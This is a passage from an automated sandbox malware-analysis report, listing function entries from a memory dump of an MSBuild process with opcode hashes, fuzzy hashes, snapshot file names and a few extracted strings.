                                                                                                              • Opcode ID: 1b0b1bb2fca3dc2a57f43169341f39b827041e54d265d2314bcc95321f27ade8
                                                                                                              • Instruction ID: 83daf7b63cfd895f7136b84282bfcca3889f0c77cb5b42836fa40a7f6b46d486
                                                                                                              • Opcode Fuzzy Hash: 1b0b1bb2fca3dc2a57f43169341f39b827041e54d265d2314bcc95321f27ade8
                                                                                                              • Instruction Fuzzy Hash: 2C51BB72D002369BDF18DFA9D980AEEBBB4BF09654F058129EA13B7641D3749C01CBE4
                                                                                                              Function 0112E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: 35694522ad1d106529945171a4f995159668d0406720f5efa73228586607982f
                                                                                                              • Instruction ID: fd2b8d37af8f7b8a7943cc1fd001aff49ba8c9834087de4912b2fe005a18cc21
                                                                                                              • Opcode Fuzzy Hash: 35694522ad1d106529945171a4f995159668d0406720f5efa73228586607982f
                                                                                                              • Instruction Fuzzy Hash: C641A07260A7229BD729DB75C840B6BBBE8AF88718F04092DFA84D7180E774D914C7D7
                                                                                                              Function 0118C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: abbca16ca7388284db4000eb9c670433430d5adf80884d4309fa40d60f27a547
                                                                                                              • Instruction ID: 0cd4b0d617698f8c8f7567c8465499ea18a13c321064c4fe72f21395857da268
                                                                                                              • Opcode Fuzzy Hash: abbca16ca7388284db4000eb9c670433430d5adf80884d4309fa40d60f27a547
                                                                                                              • Instruction Fuzzy Hash: 784143B1D1052DABDB25EB60CC84FDEB77CAB55718F0085A5AA18A7140DB309E898FA4
                                                                                                              Function 011A6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: f1f34318bd7f2fc8745daca7aecdb1e1994cdf3633d22f958de5c6290e6c7738
                                                                                                              • Instruction ID: 75f058222ad2248990b312267023907d5661dc2d06e5ccb782c0cf9f999392cd
                                                                                                              • Opcode Fuzzy Hash: f1f34318bd7f2fc8745daca7aecdb1e1994cdf3633d22f958de5c6290e6c7738
                                                                                                              • Instruction Fuzzy Hash: 08316835A003199BEB3ADF78C854BEEBFB8DF04704F984028EA50AB282D775D905CB50
                                                                                                              Function 0118CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: 518fb59b3fd73d241f81e2c3c659d9c54698402a1affb8b5930a6504312051d3
                                                                                                              • Instruction ID: 8b6cb77223023d43ec89761c28fc993ed2caf04221a8ced69747ac1256e1cbb6
                                                                                                              • Opcode Fuzzy Hash: 518fb59b3fd73d241f81e2c3c659d9c54698402a1affb8b5930a6504312051d3
                                                                                                              • Instruction Fuzzy Hash: 7231D136900919EFEB1DEA59C855FEBBB74EB807A0F018129E915A7250D7309E04DFE0
                                                                                                              Function 0119892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0119895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 0dbd9b2705a1893f293faa25c3d35f4f1296cfad59d0f5c5968065de5b4470ca
                                                                                                              • Instruction ID: 4d193e92eb8f52ae731b5bff8fbcee846173c8187fd798ae62d256664ae2673e
                                                                                                              • Opcode Fuzzy Hash: 0dbd9b2705a1893f293faa25c3d35f4f1296cfad59d0f5c5968065de5b4470ca
                                                                                                              • Instruction Fuzzy Hash: 62012B3231020AAFEF2E5B56DC88A56BB65FFC7258B04012CF65106553DB606C81CB93
                                                                                                              Function 011B2000 Relevance: .8, Instructions: 757COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25328d8facc63c78c8d7fd40c3f60c03fd365316b41ae4ee654373edbb952402
                                                                                                              • Instruction ID: f2d1692ca8a15b35da3e2c44d78cb59f51c72b8e7a1f9bc8fdb57211da4e27bd
                                                                                                              • Opcode Fuzzy Hash: 25328d8facc63c78c8d7fd40c3f60c03fd365316b41ae4ee654373edbb952402
                                                                                                              • Instruction Fuzzy Hash: 1B42C2316083419FD72DCF68C8D0AABBBE5BF98344F08492DFA9697250D774E849CB52
                                                                                                              Function 011A8158 Relevance: .6, Instructions: 617COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bf88a55293b9bc0fa77efed3f257e1ab6c817ba709ac3d06d72c81b4c936d16
                                                                                                              • Instruction ID: 8cb6349706c28c424b1f1971b3acd8ce995cc98e8683b151af09e6fdee232baa
                                                                                                              • Opcode Fuzzy Hash: 0bf88a55293b9bc0fa77efed3f257e1ab6c817ba709ac3d06d72c81b4c936d16
                                                                                                              • Instruction Fuzzy Hash: FF427F75E002198FEB29CF69C841BADBBF5BF88305F548199E948EB241D7349D81CF50
                                                                                                              Function 01122840 Relevance: .6, Instructions: 605COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce7cc7bcd0270b96d037277b6c520208c6c1cda65d8d46726811e1a8beb77d4e
                                                                                                              • Instruction ID: fdaae547a1abef149519040f261668e96a1c4ff80d580dfe41faaf71be8d0883
                                                                                                              • Opcode Fuzzy Hash: ce7cc7bcd0270b96d037277b6c520208c6c1cda65d8d46726811e1a8beb77d4e
                                                                                                              • Instruction Fuzzy Hash: 6032BB70A00B568FEB2DCF69C8447AEBBF2BF84704F24411DE5869B385E735A812CB51
                                                                                                              Function 011BA118 Relevance: .6, Instructions: 591COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 793b1b39a0526c68fe0b4ac23570d2a5e14d7e8261b9683d6fcee4295d94da4e
                                                                                                              • Instruction ID: b316c3608eaa36a067dc54969e615f3bd61174db135a206e8a2796cd3d1b966f
                                                                                                              • Opcode Fuzzy Hash: 793b1b39a0526c68fe0b4ac23570d2a5e14d7e8261b9683d6fcee4295d94da4e
                                                                                                              • Instruction Fuzzy Hash: 2522D2702046618BEB2DCF2DE0D43F2BBF1AF45300F09849AD9968F286D735E552CB61
                                                                                                              Function 01116A50 Relevance: .5, Instructions: 548COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c04d7d07300be4846a5823ec32e268884afe3d39fe5b6e4e87cf838a10b005e5
                                                                                                              • Instruction ID: 41d55792acf36dfd3a284fc5c568b5174d8afb819ee91f1abaa2ff3ca23b85c7
                                                                                                              • Opcode Fuzzy Hash: c04d7d07300be4846a5823ec32e268884afe3d39fe5b6e4e87cf838a10b005e5
                                                                                                              • Instruction Fuzzy Hash: 6E32DB71A04205DFDB29CFA8C480BAEBBF1FF48310F248569E956AB395D771E841CB91
                                                                                                              Function 01134A35 Relevance: .4, Instructions: 423COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: f9cb19b66aaaa96d7a5655c00d62e80284cce0efce7d891c53b804940f9fc6d5
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: 28F16E71E0021A9BDF1DCF99C590BEEBBF5AF88714F098129E905AB748E734D841CB64
                                                                                                              Function 011A892B Relevance: .4, Instructions: 386COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2db98f77a4ad6acb56c9f7daead4bdde1dc9ada347be8bf22d8ece364bbc966c
                                                                                                              • Instruction ID: 47f3c5e742fb47636e312fb227d53318184f0e86729bc375f88bf2d0c1a7a152
                                                                                                              • Opcode Fuzzy Hash: 2db98f77a4ad6acb56c9f7daead4bdde1dc9ada347be8bf22d8ece364bbc966c
                                                                                                              • Instruction Fuzzy Hash: 38D10279E0060A8BDF0DCF69C841AFEBBF1BF88306F598169D955A7241E735E901CB60
                                                                                                              Function 011165D0 Relevance: .4, Instructions: 383COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 250d2a431d2c18935724ee584a51e8857f8ec2eab765d4eea0f54854c12655a2
                                                                                                              • Instruction ID: 66482853b34f46eb5ba92962e3345aee77e3c1f462fe0c5b3dcedc7f866e8d8e
                                                                                                              • Opcode Fuzzy Hash: 250d2a431d2c18935724ee584a51e8857f8ec2eab765d4eea0f54854c12655a2
                                                                                                              • Instruction Fuzzy Hash: C7E18D71608342CFC719CF28C490A6AFBE1FF89314F05896DE9958B355EB72E905CB92
                                                                                                              Function 01108397 Relevance: .4, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61565ae6107d93fedfbbc82d3b9047867d0ecb9ee29a356e4d085f4f03c71cb5
                                                                                                              • Instruction ID: 85197ca5333e34092b43743b7f4e1d5db58b96722f458a3afc5f23c8cbf57f54
                                                                                                              • Opcode Fuzzy Hash: 61565ae6107d93fedfbbc82d3b9047867d0ecb9ee29a356e4d085f4f03c71cb5
                                                                                                              • Instruction Fuzzy Hash: 1CD1F471F08606DBDB1EDF69C880ABAB7A5BF54308F05422DE916DB2C0EB71E951CB50
                                                                                                              Function 01198243 Relevance: .3, Instructions: 322COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction ID: 6fef0b31054c6651617a794a0e960c05e5f30cc34878dfc3f72ac2c3f4a887cf
                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction Fuzzy Hash: 60B14374A006099FDF28DF99C940AABBBB5FF86304F14446DAA62D7791DB34E905CB10
                                                                                                              Function 01120535 Relevance: .3, Instructions: 300COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction ID: 59adec711cd3aeaaf50e9809bb461e011e6b6fb702efb526e94b87382ecb57fe
                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction Fuzzy Hash: 65B13831600656AFDB2EDB68C850BBEBBF6AF88304F150659E652D7381DB30ED41CB91
                                                                                                              Function 011183C0 Relevance: .3, Instructions: 281COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89eeb2e32ecb7de6b41cb6b2bb9e800eb219e961f41156bd26e6b8b86078851a
                                                                                                              • Instruction ID: e7e1b32953d2eac176f7e3f746505832d7e059f1b62842663fd850bb6aaea82d
                                                                                                              • Opcode Fuzzy Hash: 89eeb2e32ecb7de6b41cb6b2bb9e800eb219e961f41156bd26e6b8b86078851a
                                                                                                              • Instruction Fuzzy Hash: D0C136751083419FE768CF19C484BAABBF5FF88304F44896DE98987295DB74E908CB92
                                                                                                              Function 0110C427 Relevance: .3, Instructions: 280COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9362ac52fd81428c14ff395c961900142113b8a100d855b50466c32092459ed
                                                                                                              • Instruction ID: 08ab9651331f9be970e1e5f6fc3682d68e51d28b2b4ffa37a50d56f3ea8112fc
                                                                                                              • Opcode Fuzzy Hash: f9362ac52fd81428c14ff395c961900142113b8a100d855b50466c32092459ed
                                                                                                              • Instruction Fuzzy Hash: E9B19174B002668BDB79DF58C880BA9B3B5EF44704F0486E9D50AE7281EB71DD86CF61
                                                                                                              Function 0113E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2fd0395ec86c58f3d5bfb592a5ae2ed9672d9bb66a39895ddb13ab4c046b2967
                                                                                                              • Instruction ID: fcd3bb9a0b4d024e8e9aff417f7bb32cf1ddd6a3f36f71a6fa15ae56d7eb759f
                                                                                                              • Opcode Fuzzy Hash: 2fd0395ec86c58f3d5bfb592a5ae2ed9672d9bb66a39895ddb13ab4c046b2967
                                                                                                              • Instruction Fuzzy Hash: 74A12771E0171A9FEB2EDB98C848FAEBBB4AF44714F050121EA20AB395D7749D41CBD1
                                                                                                              Function 01150185 Relevance: .3, Instructions: 276COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 02c7f398f9550f91543a2a02a39e186f9b0720cc57c5b9f2c1677d1d67f9b907
                                                                                                              • Instruction ID: 7ac58f6c16720db7fc67bf340e1ef15e921d4abbcfeb51a4cf24490c9594b4b9
                                                                                                              • Opcode Fuzzy Hash: 02c7f398f9550f91543a2a02a39e186f9b0720cc57c5b9f2c1677d1d67f9b907
                                                                                                              • Instruction Fuzzy Hash: 32A1B570B0061ADFDB6DDFA9C591BBABBB1FF48318F144129EE5597282DB34A801CB50
                                                                                                              Function 011E4500 Relevance: .3, Instructions: 275COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d3a2698543a1cb24a02fee8d36991654b1c4ddf0a3a887c13091a41e86cf14d5
                                                                                                              • Instruction ID: 67d3d5239bcbc406c3fcdba5f77949d9acc1cdd612e637fc5a081f0b5a65035c
                                                                                                              • Opcode Fuzzy Hash: d3a2698543a1cb24a02fee8d36991654b1c4ddf0a3a887c13091a41e86cf14d5
                                                                                                              • Instruction Fuzzy Hash: 24A1FE72A00A12DFD72ADF98C984F6AB7E9FF48708F410628E585DBA51D334EC10CB91
                                                                                                              Function 011E2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                              • Instruction ID: 86fa79038f5b903bd27bfcc96e5360cc4f0dd2c613dab48b1fa74e0f80d1f0dc
                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                              • Instruction Fuzzy Hash: F9B13B71E00A1ADFDF29CFA9C894AADBBF9FF48310F148129E914A7354D730A951CB90
                                                                                                              Function 011960E0 Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b49f437fb2f42f799585873e90da595d9d77834a945bf1fbc955cac4912fec3
                                                                                                              • Instruction ID: 6d553eb978ba3e30e6a6770af66122530b405f1cb74edb4448dbfec93925f75c
                                                                                                              • Opcode Fuzzy Hash: 1b49f437fb2f42f799585873e90da595d9d77834a945bf1fbc955cac4912fec3
                                                                                                              • Instruction Fuzzy Hash: E4917171D04216AFDF19CFA8D894BAEBBB5AF48710F154169E624EB341D734EA00DBB0
                                                                                                              Function 0112E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d70ae77d752b8de3e4f5907464d866a5ddc909d17ec0532feb390baa6558910c
                                                                                                              • Instruction ID: 1f4d9f305a613729267360887fcf00b9959bb4aeda33badfa30205b2e3c7d1d2
                                                                                                              • Opcode Fuzzy Hash: d70ae77d752b8de3e4f5907464d866a5ddc909d17ec0532feb390baa6558910c
                                                                                                              • Instruction Fuzzy Hash: 35914535A0166ACBEB2CDB58C840BBD7BB1EF94728F058169E905DB381FB34D821CB51
                                                                                                              Function 011DAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: ddfde06eb107e341153937d43d101b5531eab658fd769e060038f185ec95c487
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: F281A131A0061A9FDF1DCF98D890AAEBBF6FF84314F198569D9169B384D734E902CB40
                                                                                                              Function 0114E284 Relevance: .2, Instructions: 212COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ecace5f5df5b6f0aefec234e61cd9caf67785860f2afa886f407bc394c7556d0
                                                                                                              • Instruction ID: 6489c01b4de4c57f610d1be7eb3446657be5829c489063f311716edf0ebfc70e
                                                                                                              • Opcode Fuzzy Hash: ecace5f5df5b6f0aefec234e61cd9caf67785860f2afa886f407bc394c7556d0
                                                                                                              • Instruction Fuzzy Hash: 44818071A05609EFDB2ADFA8C880EEEBBF9FF88714F104429E555A7250D730AC45CB60
                                                                                                              Function 0112C640 Relevance: .2, Instructions: 206COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 159a25c90df779796834c7ecb312eca60c29ba418393738a0f4c318fa9a1c20d
                                                                                                              • Instruction ID: c3ce200fb3e8071bfad8d99b6cb710dabb799f9205d0f4be3b3ed424b16d54b7
                                                                                                              • Opcode Fuzzy Hash: 159a25c90df779796834c7ecb312eca60c29ba418393738a0f4c318fa9a1c20d
                                                                                                              • Instruction Fuzzy Hash: D671BD75D00669DBCB2A8F59D8947FEBBB1FF58710F15421AE942AB351E7309810CBA0
                                                                                                              Function 011C47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4dbaa42c0025f947e66fc61b04946009867718539b0e1f282d3260d38811245d
                                                                                                              • Instruction ID: 046fa1aa9706376e13e7700802c707bd1570cb60581f9ff60110b75c6eaf6d34
                                                                                                              • Opcode Fuzzy Hash: 4dbaa42c0025f947e66fc61b04946009867718539b0e1f282d3260d38811245d
                                                                                                              • Instruction Fuzzy Hash: AD71F370904206EFDB29CF9DD958A9EBBF9FFA0B10F00825EE601A765AD731C940CB54
                                                                                                              Function 0112260B Relevance: .2, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6dcd14458087724bcc4964453e46842a533a2c438687d7ef0ebcbe2a2a2270ca
